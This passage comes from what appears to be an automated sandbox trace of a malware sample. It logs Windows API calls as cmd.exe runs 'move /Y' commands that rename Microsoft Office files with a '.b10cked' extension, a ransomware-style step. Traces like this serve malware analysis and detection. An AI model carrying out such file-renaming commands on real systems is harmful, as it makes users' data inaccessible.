_String2="DIR") returned 9 [0172.530] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.530] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.530] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.530] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.530] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.530] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.530] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.530] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.530] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.530] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.530] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.530] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.530] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.530] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.530] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.530] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.530] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.530] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.530] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.530] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.530] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.530] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.530] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.530] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.530] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.530] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.530] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.530] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.530] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.530] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.530] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.531] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.531] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.531] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.532] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.532] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.532] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f1cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f1c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f1c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.532] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.533] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.533] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0172.533] _wcsicmp (_String1="OUTLLI~1.TRX", _String2=".") returned 65 [0172.534] _wcsicmp (_String1="OUTLLI~1.TRX", _String2="..") returned 65 [0172.534] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlli~1.trx")) returned 0x2020 [0172.534] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.534] SetErrorMode (uMode=0x0) returned 0x0 [0172.534] SetErrorMode (uMode=0x1) returned 0x0 [0172.534] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", nBufferLength=0x104, lpBuffer=0x14eb54, lpFilePart=0x14eb3c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", lpFilePart=0x14eb3c*="OUTLLI~1.TRX") returned 0x3c [0172.534] SetErrorMode (uMode=0x0) returned 0x1 [0172.534] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.534] _wcsicmp (_String1="OUTLLI~1.TRX", _String2=".") returned 65 [0172.534] _wcsicmp (_String1="OUTLLI~1.TRX", _String2="..") returned 65 [0172.534] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlli~1.trx")) returned 0x2020 [0172.534] SetErrorMode (uMode=0x0) returned 0x0 [0172.534] SetErrorMode (uMode=0x1) returned 0x0 [0172.534] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", nBufferLength=0x104, lpBuffer=0x14efd0, lpFilePart=0x14ed68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", lpFilePart=0x14ed68*="OUTLLI~1.TRX") returned 0x3c [0172.534] SetErrorMode (uMode=0x0) returned 0x1 [0172.534] SetErrorMode (uMode=0x0) returned 0x0 [0172.535] SetErrorMode (uMode=0x1) returned 0x0 [0172.535] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14f1d8, lpFilePart=0x14ed68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked", lpFilePart=0x14ed68*="OUTLLIBR.DLL.trx_dll.b10cked") returned 0x4c [0172.535] SetErrorMode (uMode=0x0) returned 0x1 [0172.535] SetLastError (dwErrCode=0x0) [0172.535] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.dll.trx_dll.b10cked")) returned 0xffffffff [0172.535] GetLastError () returned 0x2 [0172.535] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x14e6e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e6e4) returned 0x272130 [0172.535] FindNextFileW (in: hFindFile=0x272130, lpFindFileData=0x14e6e4 | out: lpFindFileData=0x14e6e4) returned 0 [0172.535] GetLastError () returned 0x12 [0172.535] FindClose (in: hFindFile=0x272130 | out: hFindFile=0x272130) returned 1 [0172.537] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x271cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271cc0) returned 0x272130 [0172.537] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14e97c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0172.537] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x14e97c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0172.537] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.dll.trx_dll")) returned 0x2020 [0172.537] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.537] FindClose (in: hFindFile=0x272130 | out: hFindFile=0x272130) returned 1 [0172.537] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14e930 | out: _Buffer=" 1") returned 9 [0172.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.537] GetFileType (hFile=0x7) returned 0x2 [0172.538] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.538] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14e8bc | out: lpMode=0x14e8bc) returned 1 [0172.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.538] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14e8f0 | out: lpConsoleScreenBufferInfo=0x14e8f0) returned 1 [0172.538] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.538] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14e930 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0172.538] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14e914, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14e914*=0x1a) returned 1 [0172.538] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.539] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.539] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.539] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.539] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.539] SetConsoleInputExeNameW () returned 0x1 [0172.539] GetConsoleOutputCP () returned 0x1b5 [0172.539] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.539] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.539] exit (_Code=0) Process: id = "294" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16dc0" os_pid = "0x838" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22969 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22970 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22971 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22972 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 22973 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22974 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22975 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22976 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22977 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 22978 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23477 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23478 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23479 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23480 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 23481 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 23482 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23483 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23484 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23485 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23486 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23487 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23488 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23489 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23490 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23491 start_va = 0x440000 end_va = 0x507fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 23492 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23493 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23494 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23495 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 23496 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 23497 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 23498 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 23499 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 23500 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 362 os_tid = 0x974 [0172.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8cc | out: lpSystemTimeAsFileTime=0x18f8cc*(dwLowDateTime=0x9c995460, dwHighDateTime=0x1d440a9)) [0172.309] GetCurrentProcessId () returned 0x838 [0172.309] GetCurrentThreadId () returned 0x974 [0172.309] GetTickCount () returned 0x32386 [0172.309] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8c4 | out: lpPerformanceCount=0x18f8c4*=22909835718) returned 1 [0172.310] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.310] __set_app_type (_Type=0x1) [0172.310] __p__fmode () returned 0x76b331f4 [0172.310] __p__commode () returned 0x76b331fc [0172.310] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.310] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.310] GetCurrentThreadId () returned 0x974 [0172.310] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x974) returned 0x38 [0172.310] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.310] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.310] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.310] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.310] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f85c | out: phkResult=0x18f85c*=0x0) returned 0x2 [0172.311] VirtualQuery (in: lpAddress=0x18f893, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.311] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.311] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.311] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.311] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f82c, dwLength=0x1c | out: lpBuffer=0x18f82c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.311] GetConsoleOutputCP () returned 0x1b5 [0172.311] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.311] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.311] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.311] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.312] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.312] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.312] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.312] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.312] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.312] GetEnvironmentStringsW () returned 0x350218* [0172.312] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0172.312] GetEnvironmentStringsW () returned 0x350218* [0172.313] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0172.313] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7cc | out: phkResult=0x18e7cc*=0x40) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0xa8, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x0, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegCloseKey (hKey=0x40) returned 0x0 [0172.313] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7cc | out: phkResult=0x18e7cc*=0x40) returned 0x0 [0172.313] RegQueryValueExW 